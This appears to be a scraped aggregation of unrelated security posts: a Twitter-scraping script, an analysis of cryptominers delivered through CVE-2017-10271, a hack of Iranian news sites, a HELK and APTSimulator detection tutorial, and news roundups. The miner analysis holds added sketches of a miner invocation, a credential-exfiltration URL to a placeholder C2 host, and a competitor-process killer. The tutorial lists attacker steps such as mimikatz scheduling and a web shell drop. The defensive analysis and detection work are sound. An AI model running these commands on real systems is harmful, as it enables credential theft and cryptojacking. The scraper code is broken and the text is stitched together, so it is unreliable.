        if user["screen_name"] not in interactions:
          interactions.append(user["screen_name"])
  if "quoted_status" in status:
    orig_tweet = status["quoted_status"]
    if "user" in orig_tweet and orig_tweet["user"] is not None:
      user = orig_tweet["user"]
      if "screen_name" in user and user["screen_name"] is not None:
        if user["screen_name"] not in interactions:
          interactions.append(user["screen_name"])
  if "entities" in status:
    entities = status["entities"]
    if "user_mentions" in entities:
      for item in entities["user_mentions"]:
        if item is not None and "screen_name" in item:
          mention = item['screen_name']
          if mention is not None and mention not in interactions:
            interactions.append(mention)
  return interactions

# Returns a list of hashtags found in the tweet
def get_hashtags(status):
  hashtags = []
  if "entities" in status:
    entities = status["entities"]
    if "hashtags" in entities:
      for item in entities["hashtags"]:
        if item is not None and "text" in item:
          hashtag = item['text']
        if hashtag is not None and hashtag not in hashtags:
          hashtags.append(hashtag)
  return hashtags

# Returns a list of URLs found in the Tweet
def get_urls(status):
  urls = []
  if "entities" in status:
    entities = status["entities"]
    if "urls" in entities:
      for item in entities["urls"]:
        if item is not None and "expanded_url" in item:
          url = item['expanded_url']
          if url is not None and url not in urls:
            urls.append(url)
  return urls

# Returns the URLs to any images found in the Tweet
def get_image_urls(status):
  urls = []
  if "entities" in status:
    entities = status["entities"]
    if "media" in entities:
      for item in entities["media"]:
        if item is not None:
          if "media_url" in item:
            murl = item["media_url"]
            if murl not in urls:
              urls.append(murl)
  return urls

# Main starts here
if __name__ == '__main__':
# Add your own API key values here (the empty strings are placeholders)
  consumer_key = ""
  consumer_secret = ""
  access_token = ""
  access_token_secret = ""

  twarc = Twarc(consumer_key, consumer_secret, access_token, access_token_secret)

# Check that search terms were provided at the command line
  target_list = []
  if len(sys.argv) > 1:
    target_list = sys.argv[1:]
  else:
    print("No search terms provided. Exiting.")
    sys.exit(0)

  num_targets = len(target_list)
  for count, target in enumerate(target_list):
    print(str(count + 1) + "/" + str(num_targets) + " searching on target: " + target)
# Create a separate save directory for each search query
# Since search queries can be a whole sentence, we'll check the length
# and simply number it if the query is overly long
    save_dir = ""
    if len(target) < 30:
      save_dir = target.replace(" ", "_")
    else:
      save_dir = "target_" + str(count + 1)
    if not os.path.exists(save_dir):
      print("Creating directory: " + save_dir)
      os.makedirs(save_dir)
# Variables for capturing stuff
    tweets_captured = 0
    influencer_frequency_dist = Counter()
    mentioned_frequency_dist = Counter()
    hashtag_frequency_dist = Counter()
    url_frequency_dist = Counter()
    user_user_graph = {}
    user_hashtag_graph = {}
    hashtag_hashtag_graph = {}
    all_image_urls = []
    tweets = {}
    tweet_count = 0
# Start the search
    for status in
# Output some status as we go, so we know something is happening
      sys.stdout.write("\rCollected " + str(tweet_count) + " tweets.")
      sys.stdout.flush()
      tweet_count += 1
      screen_name = None
      if "user" in status:
        if "screen_name" in status["user"]:
          screen_name = status["user"]["screen_name"]

      retweeted = retweeted_user(status)
      if retweeted is not None:
        influencer_frequency_dist[retweeted] += 1
        influencer_frequency_dist[screen_name] += 1

# Tweet text can be in either "text" or "full_text" field...
      text = None
      if "full_text" in status:
        text = status["full_text"]
      elif "text" in status:
        text = status["text"]

      id_str = None
      if "id_str" in status:
        id_str = status["id_str"]

# Assemble the URL to the tweet we received...
      tweet_url = None
      if id_str is not None and screen_name is not None:
        tweet_url = "" + screen_name + "/status/" + id_str

# ...and capture it
      if tweet_url is not None and text is not None:
        tweets[tweet_url] = text

# Record mapping graph between users
      interactions = get_interactions(status)
      if interactions is not None:
        for user in interactions:
          mentioned_frequency_dist[user] += 1
          if screen_name not in user_user_graph:
            user_user_graph[screen_name] = {}
          if user not in user_user_graph[screen_name]:
            user_user_graph[screen_name][user] = 1
          else:
            user_user_graph[screen_name][user] += 1

# Record mapping graph between users and hashtags
      hashtags = get_hashtags(status)
      if hashtags is not None:
        if len(hashtags) > 1:
          hashtag_interactions = []
# This code creates pairs of hashtags in situations where multiple
# hashtags were found in a tweet
# This is used to create a graph of hashtag-hashtag interactions
          for comb in combinations(sorted(hashtags), 2):
            hashtag_interactions.append(comb)
          if len(hashtag_interactions) > 0:
            for inter in hashtag_interactions:
              item1, item2 = inter
              if item1 not in hashtag_hashtag_graph:
                hashtag_hashtag_graph[item1] = {}
              if item2 not in hashtag_hashtag_graph[item1]:
                hashtag_hashtag_graph[item1][item2] = 1
              else:
                hashtag_hashtag_graph[item1][item2] += 1
        for hashtag in hashtags:
          hashtag_frequency_dist[hashtag] += 1
          if screen_name not in user_hashtag_graph:
            user_hashtag_graph[screen_name] = {}
          if hashtag not in user_hashtag_graph[screen_name]:
            user_hashtag_graph[screen_name][hashtag] = 1
          else:
            user_hashtag_graph[screen_name][hashtag] += 1

      urls = get_urls(status)
      if urls is not None:
        for url in urls:
          url_frequency_dist[url] += 1

      image_urls = get_image_urls(status)
      if image_urls is not None:
        for url in image_urls:
          if url not in all_image_urls:
            all_image_urls.append(url)

# Iterate through image URLs, fetching each image if we haven't already
    print("Fetching images.")
    pictures_dir = os.path.join(save_dir, "images")
    if not os.path.exists(pictures_dir):
      print("Creating directory: " + pictures_dir)
      os.makedirs(pictures_dir)
    for url in all_image_urls:
      m ="^http:\/\/pbs\.twimg\.com\/media\/(.+)$", url)
      if m is not None:
        filename =
        print("Getting picture from: " + url)
        save_path = os.path.join(pictures_dir, filename)
        if not os.path.exists(save_path):
          response = requests.get(url, stream=True)
          with open(save_path, 'wb') as out_file:
            shutil.copyfileobj(response.raw, out_file)
          del response

# Output a bunch of files containing the data we just gathered
    print("Saving data.")
    json_outputs = {"tweets.json": tweets,
                    "urls.json": url_frequency_dist,
                    "hashtags.json": hashtag_frequency_dist,
                    "influencers.json": influencer_frequency_dist,
                    "mentioned.json": mentioned_frequency_dist,
                    "user_user_graph.json": user_user_graph,
                    "user_hashtag_graph.json": user_hashtag_graph,
                    "hashtag_hashtag_graph.json": hashtag_hashtag_graph}
    for name, dataset in json_outputs.items():
      filename = os.path.join(save_dir, name)
      save_json(dataset, filename)

# These files are created in a format that can be easily imported into Gephi
    csv_outputs = {"user_user_graph.csv": user_user_graph,
                   "user_hashtag_graph.csv": user_hashtag_graph,
                   "hashtag_hashtag_graph.csv": hashtag_hashtag_graph}
    for name, dataset in csv_outputs.items():
      filename = os.path.join(save_dir, name)
      save_csv(dataset, filename)

    text_outputs = {"hashtags.txt": hashtag_frequency_dist,
                    "influencers.txt": influencer_frequency_dist,
                    "mentioned.txt": mentioned_frequency_dist,
                    "urls.txt": url_frequency_dist}
    for name, dataset in text_outputs.items():
      filename = os.path.join(save_dir, name)
      save_text(dataset, filename)

Running this tool will create a directory for each search term provided at the command line. To search for a sentence, or to include multiple terms, enclose the argument in quotes. Due to Twitter’s rate limiting, your search may hit a limit and need to pause until the rate limit resets. Luckily, twarc takes care of that. Once the search is finished, a bunch of files will be written to the previously created directory.

Since I use a Mac, I can use its Quick Look functionality from the Finder to browse the output files created. Because pytorch is gaining a lot of interest, I ran my script against that search term. Here are some examples of how I can quickly view the output files.

The preview pane is enough to get an overview of the recorded data.


Pressing spacebar opens the file in Quick Look, which is useful for data that doesn’t fit neatly into the preview pane.

Importing the user_user_graph.csv file into Gephi provided me with some neat visualizations about the pytorch community.

A full zoom out of the pytorch community

Here we can see who the main influencers are. It seems that Yann LeCun and François Chollet are Tweeting about pytorch, too.

Here’s a zoomed-in view of part of the network.

Zoomed in view of part of the Gephi graph generated.

If you enjoyed this post, check out the previous two articles I published on using the Twitter API here and here. I hope you have fun tailoring this script to your own needs!

They Stole My Shoes – Paul’s Security Weekly #548

This week, Steve Tcherchian, CISO and Director of Product Management of XYPRO Technology joins us for an interview! In our second feature interview, Paul speaks with Michael Bazzell, OSINT & Privacy Consultant! In the news, we have updates from Google, Bitcoin, NSA, Microsoft, and more on this episode of Paul's Security Weekly!

Full Show Notes:


Visit for all the latest episodes!

CVE-2017-10271 Used to Deliver CryptoMiners: An Overview of Techniques Used Post-Exploitation and Pre-Mining


FireEye researchers recently observed threat actors abusing CVE-2017-10271 to deliver various cryptocurrency miners.

CVE-2017-10271 is a known input validation vulnerability that exists in affected versions of the WebLogic Server Security Service (WLS Security) in Oracle WebLogic Server, and attackers can exploit it to remotely execute arbitrary code. Oracle released a Critical Patch Update that reportedly fixes this vulnerability. Users who failed to patch their systems may find themselves mining cryptocurrency for threat actors.

FireEye observed a high volume of activity associated with the exploitation of CVE-2017-10271 following the public posting of proof of concept code in December 2017. Attackers then leveraged this vulnerability to download cryptocurrency miners in victim environments.

We saw evidence of organizations located in various countries – including the United States, Australia, Hong Kong, United Kingdom, India, Malaysia, and Spain, as well as those from nearly every industry vertical – being impacted by this activity. Actors involved in cryptocurrency mining operations mainly exploit opportunistic targets rather than specific organizations. This, coupled with the diversity of organizations potentially affected by this activity, suggests that the external targeting calculus of these attacks is indiscriminate in nature.

The recent cryptocurrency boom has resulted in a growing number of operations – employing diverse tactics – aimed at stealing cryptocurrencies. The perception that these cryptocurrency mining operations are less risky, along with their potentially substantial profits, could lead cyber criminals to begin shifting away from ransomware campaigns.

Tactic #1: Delivering the miner directly to a vulnerable server

Some tactics we've observed involve exploiting CVE-2017-10271, leveraging PowerShell to download the miner directly onto the victim’s system (Figure 1), and executing it using ShellExecute().

Figure 1: Downloading the payload directly

Tactic #2: Utilizing PowerShell scripts to deliver the miner

Other tactics involve the exploit delivering a PowerShell script, instead of downloading the executable directly (Figure 2).

Figure 2: Exploit delivering PowerShell script

This script has the following functionalities:

  • Downloading miners from remote servers

Figure 3: Downloading cryptominers

As shown in Figure 3, the .ps1 script tries to download the payload from the remote server to a vulnerable server.

  • Creating scheduled tasks for persistence

Figure 4: Creation of scheduled task

  • Deleting scheduled tasks of other known cryptominers

Figure 5: Deletion of scheduled tasks related to other miners

In Figure 4, the cryptominer creates a scheduled task with name “Update service for Oracle products1”.  In Figure 5, a different variant deletes this task and other similar tasks after creating its own, “Update service for Oracle productsa”.  

From this, it’s quite clear that different attackers are fighting over the resources available in the system.

  • Killing processes matching certain strings associated with other cryptominers

Figure 6: Terminating processes directly

Figure 7: Terminating processes matching certain strings

Similar to scheduled tasks deletion, certain known mining processes are also terminated (Figure 6 and Figure 7).

  • Connects to mining pools with wallet key

Figure 8: Connection to mining pools

The miner is then executed with different flags to connect to mining pools (Figure 8). Some of the other observed flags are: -a for algorithm, -k for keepalive to prevent timeout, -o for URL of mining server, -u for wallet key, -p for password of mining server, and -t for limiting the number of miner threads.
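
As an illustration, flags like those listed above resemble a typical XMRig-style miner command line. The pool URL, wallet key, thread count, and binary name below are hypothetical placeholders, not observed indicators from this campaign:

```shell
# Illustrative only: hypothetical miner invocation using the flags described above
./miner -a cryptonight -k -o stratum+tcp:// \
        -u <WALLET_KEY> -p x -t 2
```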

  • Limiting CPU usage to avoid suspicion

Figure 9: Limiting CPU Usage

To avoid suspicion, some attackers are limiting the CPU usage of the miner (Figure 9).
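Putting the flags above together, a hypothetical launch command can be sketched as follows; the binary name, pool URL, wallet, and values are illustrative placeholders, not observed samples:

```python
# Hypothetical reconstruction of a miner invocation using the flags
# described above (-a, -k, -o, -u, -p, -t); all values are illustrative.
def build_miner_args(binary, algo, pool_url, wallet, password, threads):
    """Assemble an XMRig-style argument list from the observed flags."""
    return [
        binary,
        "-a", algo,          # mining algorithm
        "-k",                # keepalive, prevents pool timeouts
        "-o", pool_url,      # URL of the mining server (pool)
        "-u", wallet,        # wallet key / worker identifier
        "-p", password,      # password for the mining server
        "-t", str(threads),  # cap on the number of miner threads
    ]

args = build_miner_args("miner.exe", "cryptonight",
                        "stratum+tcp://pool.example:3333",
                        "WALLET_KEY", "x", 2)
print(" ".join(args))
```

Capping `-t` at a low value is what makes the CPU-limiting behavior in Figure 9 possible.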

Tactic #3: Lateral movement across Windows environments using Mimikatz and EternalBlue

Some tactics involve spreading laterally across a victim’s environment using dumped Windows credentials and the EternalBlue vulnerability (CVE-2017-0144).

The malware checks whether it's running on a 32-bit or 64-bit system to determine which PowerShell script to fetch from the command and control (C2) server. It then inspects every network adapter, aggregating the destination IPs of all established, non-loopback network connections. Each IP address is then tested with the extracted credentials, and a credential-based PowerShell execution is attempted that downloads and executes the malware from the C2 server on the target machine. This variant maintains persistence via WMI (Windows Management Instrumentation).

The malware also has the capability to perform a Pass-the-Hash attack with the NTLM information derived from Mimikatz in order to download and execute the malware in remote systems.

Additionally, the malware exfiltrates stolen credentials to the attacker via an HTTP GET request to: 'http://<C2>:8000/api.php?data=<credential data>'.
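For illustration, the exfiltration request could be constructed as below; the C2 host is a placeholder mirroring the report's `<C2>` notation, and the credential string is invented:

```python
from urllib.parse import quote

# Sketch of how the observed exfiltration URL could be built; "c2.example"
# stands in for the report's '<C2>' placeholder, and the credential data
# is an invented sample.
def exfil_url(c2_host, credential_data):
    return "http://{}:8000/api.php?data={}".format(
        c2_host, quote(credential_data, safe=""))

url = exfil_url("c2.example", "DOMAIN\\user:hash")
print(url)
```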

If lateral movement with credentials fails, the malware uses the PingCastle MS17-010 scanner (PingCastle is a French Active Directory security tool) to determine whether that particular host is vulnerable to EternalBlue, and if so, uses the exploit to spread to it.

After all network-derived IPs have been processed, the malware generates random IPs and uses the same combination of PingCastle and EternalBlue to spread to those hosts.

Tactic #4: Scenarios observed in Linux OS

We’ve also observed this vulnerability being exploited to deliver shell scripts (Figure 10) that have functionality similar to the PowerShell scripts.

Figure 10: Delivery of shell scripts

The shell script performs the following activities:

  • Attempts to kill already running cryptominers

Figure 11: Terminating processes matching certain strings

  • Downloads and executes cryptominer malware

Figure 12: Downloading CryptoMiner

  • Creates a cron job to maintain persistence

Figure 13: Cron job for persistence

  • Tries to kill other potential miners to monopolize CPU usage

Figure 14: Terminating other potential miners

The function shown in Figure 14 is used to find processes that have high CPU usage and terminate them. This terminates other potential miners and maximizes the utilization of resources.
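A minimal sketch of that logic, assuming the process list has already been parsed from `ps` output (the threshold and PIDs here are invented):

```python
import os

# Illustrative Python equivalent of the shell function in Figure 14:
# select processes above a CPU threshold, excluding the miner's own PID,
# so they can be terminated. Threshold and sample data are invented.
def high_cpu_victims(processes, threshold=40.0, own_pid=None):
    """processes: iterable of (pid, cpu_percent) pairs, e.g. parsed from
    `ps aux`. Returns the PIDs a miner would try to terminate."""
    own_pid = os.getpid() if own_pid is None else own_pid
    return [pid for pid, cpu in processes
            if cpu >= threshold and pid != own_pid]

sample = [(101, 95.2), (102, 3.1), (103, 55.0), (104, 88.8)]
print(high_cpu_victims(sample, threshold=40.0, own_pid=104))
```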


The use of cryptocurrency mining malware is a popular tactic among financially motivated cyber criminals looking to make money from victims. We've observed one threat actor mining around 1 XMR/day, demonstrating the profitability driving the recent rise in such attacks. Additionally, these operations may be perceived as less risky than ransomware operations, since victims may not even know the activity is occurring beyond a slowdown in system performance.

Notably, cryptocurrency mining malware is being distributed using various tactics, typically in an opportunistic and indiscriminate manner, so that cyber criminals can maximize their reach and profits.

FireEye HX, being a behavior-based solution, is not affected by cryptominer tricks. FireEye HX detects these threats at the initial level of the attack cycle, when the attackers attempt to deliver the first stage payload or when the miner tries to connect to mining pools.

At the time of writing, FireEye HX detects this activity with the following indicators:

Detection Name

Indicators of Compromise

Thanks to Dileep Kumar Jallepalli and Charles Carmakal for their help in the analysis.

Happy Valentine’s Day – Enterprise Security Weekly #80

This week, Paul and John are accompanied by Guy Franco, Security Consultant for Javelin Networks, who will deliver a Technical Segment on Domain Persistence! In the news, we have updates from ServerSide, Palo Alto, NopSec, Microsoft, and more on this episode of Enterprise Security Weekly!  


Full Show Notes:


Visit for all the latest episodes!

On the Anniversary of the Islamic Revolution, 30 Iranian News sites hacked to show death of Ayatollah Khamenei

February 11th marked the 39th anniversary of the Islamic Revolution in Iran, the day when the Shah was overthrown and the government replaced by that of Ayatollah Khomeini, called "The Supreme Leader" of Iran. February 10th marked something quite different: the day when hackers gained administrative control of more than 30 Iranian news websites, using stolen credentials to log in to their Content Management Systems (CMS) and publish a fake news article announcing the death of Ayatollah Khamenei.

The Iranian Ministry of Communications and Information Technology shared the results of its investigation via the Iranian CERT, which announced the details of the hack in a PDF report. All of the websites in question were hosted on the same platform, a Microsoft IIS webserver.

Most of the thirty hacked websites were insignificant as far as global traffic is concerned, but several are quite popular. We evaluated each site listed in the report by looking up its Alexa ranking; Alexa tracks the popularity of websites across the Internet. Three of the sites are among the 100,000 most popular websites on the Internet.

[Table: News Site / Alexa Ranking]

These rankings would put the online readership of the top news sites listed on par with a mid-sized American newspaper. For example, the Fort Worth Star-Telegram ranks 31,375, while the Springfield, Illinois State Journal-Register is 84,882. (For further comparison, the Boston Globe is 4,656, while the New York Times is #111.)

Hacked sites not listed by Alexa among the top ten million sites on the Internet included a number of smaller outlets.

The CERT's report notes that the primary explanation of the attack is that all of the attacked news sites have "the default user name and password of the backup company" and that a "high-level" email account with the same username and password had permissions to all sites.

Although the official Islamic Republic News Agency says the source of the attack was "the United Kingdom and the United States", that accusation is not entirely clear after reviewing the report from the CERT. The IP address is listed by the Iranian CERT as belonging to a UK-based company using AS47453. Several sources, including an Iranian site, point out that this is actually a Bulgarian IP address: AS47453 belongs to a company whose support details are listed in Pleven, Bulgaria.

[Image caption: the IP address, mislabeled in the original report]
This IP address error does seem to have been human error rather than deception, and the CERT has released an updated version of the Iranian news site hacking report showing the corrected information.

The Corrected version of the report ... (created Feb 12 0408AM)

The CERT report is rather uncomplimentary of the hackers, mentioning several clumsy failed attempts to dump a list of userids and passwords from the Content Management System database via SQL injection, as well as several other automated attacks. In the end, however, the measure of a hacker is in many ways SUCCESS, and it does seem that the objective, shaming the Ayatollah by declaring his death on the eve of the Islamic Revolution holiday, was achieved.

While a source IP address alone cannot provide attack attribution, Newsweek reports that on the day the attack began (Thursday, February 8, 2018), Ayatollah Ali Khamenei gave a speech to commanders of the Iranian Air Force in which he claimed that the United States had created the Islamic State militant group and is responsible for all the death and destruction ISIS has caused. That could certainly serve as a motive for certain actors. Although the holiday itself, called by some American politicians "Death to America Day", included the usual occasional burning of American, Israeli, and British flags, as well as several Donald Trump effigies, overall the protests seemed more timid than in the past.


IDG Contributor Network: How to ensure that giving notice doesn’t mean losing data

Most IT teams invest resources to ensure data security when onboarding new employees. You probably have a checklist that covers network access and permissions, access to data repositories, security policy acknowledgement, and maybe even security awareness education. But how robust is your offboarding security checklist? If you’re just collecting a badge and disabling network and email access on the employee’s last day, you’re not doing enough to protect your data.

Glassdoor reported recently that 35% of hiring decision makers expect more employees to quit in 2018 compared to last year. Whether through malicious intent or negligence, when insiders leave, there’s a risk of data leaving with them. To ensure data security, you need to develop and implement a robust offboarding process.

To read this article in full, please click here

This Is An Emergency – Business Security Weekly #73

This week, Michael and Paul interview Dawn-Marie Hutchinson, Executive Director of Optiv Offline! In the Article Discussion, security concern pushing IT to channel services, what drives sales growth and repeat business, and in the news, we have updates from Proofpoint, J2 Global, LogMeIn, and more on this episode of Business Security Weekly!

Full Show Notes:


Visit for all the latest episodes!

Jim Carrey Hacked My Facebook – Application Security Weekly #05

This week, Keith and Paul continue to discuss OWASP Application Security Verification Standard! In the news, Cisco investigation reveals ASA vulnerability is worse than originally thought, Google Chrome HTTPS certificate apocalypse, Intel made smart glasses that look normal, and more on this episode of Application Security Weekly!


Full Show Notes:


Visit for all the latest episodes!

IDG Contributor Network: 7 ways to stay safe online on Valentine’s Day

Valentine’s Day brings out the softer side in all of us and often plays on our quest for love and appreciation. Online scammers know that consumers are more open to accepting cards, gifts and invitations all in the name of the holiday. While our guards are down, here are a few tips for safeguarding yourself while on your quest to find love on the Internet.

1. Darker side of dating websites

Unfortunately, dating websites — and modern dating apps — are a hunting ground for hackers. There is a peak of online dating activity between New Year’s and Valentine’s Day, and cybercriminals are ready to take advantage of the increased activity on popular dating websites like Tinder, OKCupid, Plenty of Fish, and many others. Rogue adverts and rogue profiles are two of the biggest offenders. For example, many are skeptical of unsolicited advertisements via email. Therefore, spammers have moved to popular websites, including dating and adult sites, to post rogue ads and links. In August 2015, Malwarebytes detected malvertising attacks on PlentyOfFish, which draws more than three million daily users. Just a few months later, the U.K. version of online dating website was also caught serving up malvertising.

To read this article in full, please click here

toolsmith #131 – The HELK vs APTSimulator – Part 1

Ladies and gentlemen, for our main attraction, I give you...The HELK vs APTSimulator, in a Death Battle! The late, great Randy "Macho Man" Savage said many things in his day, in his own special way, but "Expect the unexpected in the kingdom of madness!" could be our toolsmith theme this month and next. Man, am I having a flashback to my college days, many moons ago. :-) The HELK just brought it on. Yes, I know, HELK is the Hunting ELK stack, got it, but it reminded me of the Hulk, and then, I thought of a Hulkamania showdown with APTSimulator, and Randy Savage's classic, raspy voice popped in my head with "Hulkamania is like a single grain of sand in the Sahara desert that is Macho Madness." And that, dear reader, is a glimpse into exactly three seconds or less in the mind of your scribe, a strange place to be certain. But alas, that's how we came up with this fabulous showcase.
In this corner, from Roberto Rodriguez, @Cyb3rWard0g, the specter in SpecterOps, it's...The...HELK! This, my friends, is the s**t, worth every ounce of hype we can muster.
And in the other corner, from Florian Roth, @cyb3rops, the Fracas of Frankfurt, we have APTSimulator. All your worst adversary apparitions in one APT mic drop. Battle!

Now, with that out of our system, let's begin. There's a lot of goodness here, so I'm definitely going to do this in two parts so as not to undervalue these two offerings.
HELK is incredibly easy to install. It's also well documented, with lots of related reading material; let me propose that you take the time to review it all. Pay particular attention to the wiki, gain comfort with the architecture, then review the installation steps.
On an Ubuntu 16.04 LTS system I ran:
  • git clone
  • cd HELK/
  • sudo ./ 
Of the three installation options I was presented with, pulling the latest HELK Docker image from cyb3rward0g's Docker Hub, building the HELK image from a local Dockerfile, or installing HELK from a local bash script, I chose the first and went with the latest Docker image. The installation script does a fantastic job of fulfilling dependencies for you; if you haven't already installed Docker, the HELK install script does it for you. You can observe the entire install process in Figure 1.
Figure 1: HELK Installation
You can immediately confirm your clean installation by navigating to your HELK KIBANA URL, in my case
For my test Windows system I created a Windows 7 x86 virtual machine with VirtualBox. The key to success here is ensuring that you install Winlogbeat on the Windows systems from which you'd like to ship logs to HELK. More important is ensuring that you run Winlogbeat with the right winlogbeat.yml file. You'll want to modify and copy this to your target systems. The critical modification is line 123, under the Kafka output, where you need to add the IP address for your HELK server in three spots. My modification appeared as hosts: ["","",""]. As noted in the HELK architecture diagram, HELK consumes Winlogbeat event logs via Kafka.
On your Windows systems, with a properly modified winlogbeat.yml, you'll run:
  • ./winlogbeat -c winlogbeat.yml -e
  • ./winlogbeat setup -e
You'll definitely want to set up Sysmon on your target hosts as well. I prefer to do so with the @SwiftOnSecurity configuration file. If you're doing so with your initial setup, use sysmon.exe -accepteula -i sysmonconfig-export.xml. If you're modifying an existing configuration, use sysmon.exe -c sysmonconfig-export.xml.  This will ensure rich data returns from Sysmon, when using adversary emulation services from APTsimulator, as we will, or experiencing the real deal.
With everything set up and working, you should see results in your Kibana dashboard, as seen in Figure 2.

Figure 2: Initial HELK Kibana Sysmon dashboard.
Now for the showdown. :-) Florian's APTSimulator does some comprehensive emulation to make your systems appear compromised under the following scenarios:
  • POCs: Endpoint detection agents / compromise assessment tools
  • Test your security monitoring's detection capabilities
  • Test your SOCs response on a threat that isn't EICAR or a port scan
  • Prepare an environment for digital forensics classes 
This is a truly admirable effort, one I advocate for most heartily as a blue team leader. With particular attention to testing your security monitoring's detection capabilities: if you don't do so regularly and comprehensively, you are, quite simply, incomplete in your practice. If you haven't tested and validated, don't consider it detection; it's just a rule with a prayer. APTSimulator can be observed conducting the likes of:
  1. Creating typical attacker working directory C:\TMP...
  2. Activating guest user account
    1. Adding the guest user to the local administrators group
  3. Placing a svchost.exe (which is actually srvany.exe) into C:\Users\Public
  4. Modifying the hosts file
    1. Adding mapping to private IP address
  5. Using curl to access well-known C2 addresses
    1. C2:
  6. Dropping a Powershell netcat alternative into the APT dir
  7. Executing nbtscan on the local network
  8. Dropping a modified PsExec into the APT dir
  9. Registering mimikatz in an At job
  10. Registering a malicious RUN key
  11. Registering mimikatz in a scheduled task
  12. Registering cmd.exe as debugger for sethc.exe
  13. Dropping web shell in new WWW directory
A couple of notes here.
Download and install APTSimulator from the Releases section of its GitHub page.
APTSimulator includes curl.exe, 7z.exe, and 7z.dll in its helpers directory. Be sure that you drop the correct version of 7-Zip for your system architecture; the default bits are 64-bit, and I was testing on a 32-bit VM.

Let's do a fast run-through with HELK's Kibana Discover option, looking for the above-mentioned APTSimulator activities. Starting with a search for TMP in the sysmon-* index yields immediate results and strikes #1, 6, 7, and 8 from our APTSimulator list above; see for yourself in Figure 3.

Figure 3: TMP, PS nc, nbtscan, and PsExec in one shot
Created TMP, dropped a PowerShell netcat, nbtscanned the local network, and dropped a modified PsExec, check, check, check, and check.
How about enabling the guest user account and adding it to the local administrator's group? Figure 4 confirms.

Figure 4: Guest enabled and escalated
Strike #2 from the list. Something tells me we'll immediately find svchost.exe in C:\Users\Public. Aye, Figure 5 makes it so.

Figure 5: I've got your svchost right here
Knock #3 off the to-do list, including the process.commandline and file.creationtime references. Up next, the At job and scheduled task creation. Indeed, see Figure 6.

Figure 6. tasks OR schtasks
I think you get the point; there weren't any misses here. There are, of course, visualization options. Don't forget about Kibana's Timelion feature. Forensicators and incident responders live and die by timelines, so use it to your advantage (Figure 7).

Figure 7: Timelion
Finally, for this month, under HELK's Kibana Visualize menu, you'll note 34 visualizations. By default, these are pretty basic, but you can quickly add value with sub-buckets. As an example, I selected the Sysmon_UserName visualization. Initially, it yielded a donut graph inclusive of malman (my pwned user), SYSTEM, and LOCAL SERVICE. Not detailed enough to be particularly useful, so I added a sub-bucket to include the process names associated with each user. The resulting graph is more detailed and tells us that of the 242 events in the last four hours associated with the malman user, 32 were specific to cmd.exe processes, or 13.2% (Figure 8).

Figure 8: Powerful visualization capabilities
This has been such a pleasure this month; I am thrilled with both HELK and APTSimulator. The true principles of blue teaming and detection quality are innate in these projects. The fact that Roberto considers HELK to still be in an alpha state leads me to believe there is so much more to come. Be sure to dig deeply into APTSimulator's advanced solutions as well; there's more than one way to emulate an adversary.
Next month Part 2 will explore the Network side of the equation via the Network Dashboard and related visualizations, as well as HELK integration with Spark, Graphframes & Jupyter notebooks.
Aw snap, more goodness to come, I can't wait.
Cheers...until next time.

Weekly Cyber Risk Roundup: Cryptocurrency Attacks and a Major Cybercriminal Indictment

Cryptocurrency continued to make headlines this past week for a variety of cybercrime-related activities.

For starters, researchers discovered a new cryptocurrency miner, dubbed ADB.Miner, that infected nearly 7,000 Android devices such as smartphones, televisions, and tablets over a several-day period. The researchers said the malware uses the ADB debug interface on port 5555 to spread and that it has Mirai code within its scanning module.

In addition, several organizations reported malware infections involving cryptocurrency miners. Four servers at a wastewater facility in Europe were infected with malware designed to mine Monero, and the incident is the first ever documented mining attack to hit an operational technology network of a critical infrastructure operator, security firm Radiflow said. In addition, Decatur County General Hospital recently reported that cryptocurrency mining malware was found on a server related to its electronic medical record system.

Reuters also reported this week on allegations by South Korea that North Korea had hacked into unnamed cryptocurrency exchanges and stolen billions of won. Investors of the Bee Token ICO were also duped after scammers sent out phishing messages to the token’s mailing list claiming that a surprise partnership with Microsoft had been formed and that those who contributed to the ICO in the next six hours would receive a 100% bonus.

All of the recent cryptocurrency-related cybercrime headlines have led some experts to speculate that the use of mining software on unsuspecting users’ machines, or cryptojacking, may eventually surpass ransomware as the primary money maker for cybercriminals.


Other trending cybercrime events from the week include:

  • W-2 data compromised: The City of Pittsburg said that some employees had their W-2 information compromised due to a phishing attack. The University of Northern Colorado said that 12 employees had their information compromised due to unauthorized access to their profiles on the university’s online portal, Ursa, which led to the theft of W-2 information. Washington school districts are warning that an ongoing phishing campaign is targeting human resources and payroll staff in an attempt to compromise W-2 information.
  • U.S. defense secrets targeted: The Russian hacking group known as Fancy Bear successfully gained access to the email accounts of contract workers related to sensitive U.S. defense technology; however, it is uncertain what may have been stolen. The Associated Press reported that the group targeted at least 87 people working on militarized drones, missiles, rockets, stealth fighter jets, cloud-computing platforms, or other sensitive activities, and as many as 40 percent of those targeted ultimately clicked on the hackers’ phishing links.
  • Financial information stolen: Advance-Online is notifying customers that their personal and financial information stored on the company’s online platform may have been subject to unauthorized access from April 29, 2017 to January 12, 2018. Citizens Financial Group is notifying customers that their financial information may have been compromised due to the discovery of a skimming device found at a Citizens Bank ATM in Connecticut. Ameriprise Financial is notifying customers that one of its former employees has been calling its service center and impersonating them by using their names, addresses, and account numbers.
  • Other notable events:  Swisscom said that the “misappropriation of a sales partner’s access rights” led to a 2017 data breach that affected approximately 800,000 customers. A cloud repository belonging to the Paris-based brand marketing company Octoly was erroneously configured for public access and exposed the personal information of more than 12,000 Instagram, Twitter, and YouTube personalities. Ron’s Pharmacy in Oregon is notifying customers that their personal information may have been compromised due to unauthorized access to an employee’s email account. Partners Healthcare said that a May 2017 data breach may have exposed the personal information of up to 2,600 patients. Harvey County in Kansas said that a cyber-attack disrupted county services and led to a portion of the network being disabled. Smith Dental in Tennessee said that a ransomware infection may have compromised the personal information of 1,500 patients. Fresenius Medical Care North America has agreed to a $3.5 million settlement to settle potential HIPAA violations stemming from five separate breaches that occurred in 2012.

SurfWatch Labs collected data on many different companies tied to cybercrime over the past week. Some of those “newly seen” targets, meaning they either appeared in SurfWatch Labs’ data for the first time or else reappeared after being absent for several weeks, are shown in the chart below.


Cyber Risk Trends From the Past Week

A federal indictment charging 36 individuals for their roles in a cybercriminal enterprise known as the Infraud Organization, which was responsible for more than $530 million in losses, was unsealed this past week. Acting Assistant Attorney General Cronan said the case is “one of the largest cyberfraud enterprise prosecutions ever undertaken by the Department of Justice.”

The indictment alleges that the group engaged in the large-scale acquisition, sale, and dissemination of stolen identities, compromised debit and credit cards, personally identifiable information, financial and banking information, computer malware, and other contraband dating back to October 2010. Thirteen of those charged were taken into custody in countries around the world.

As the Justice Department press release noted:

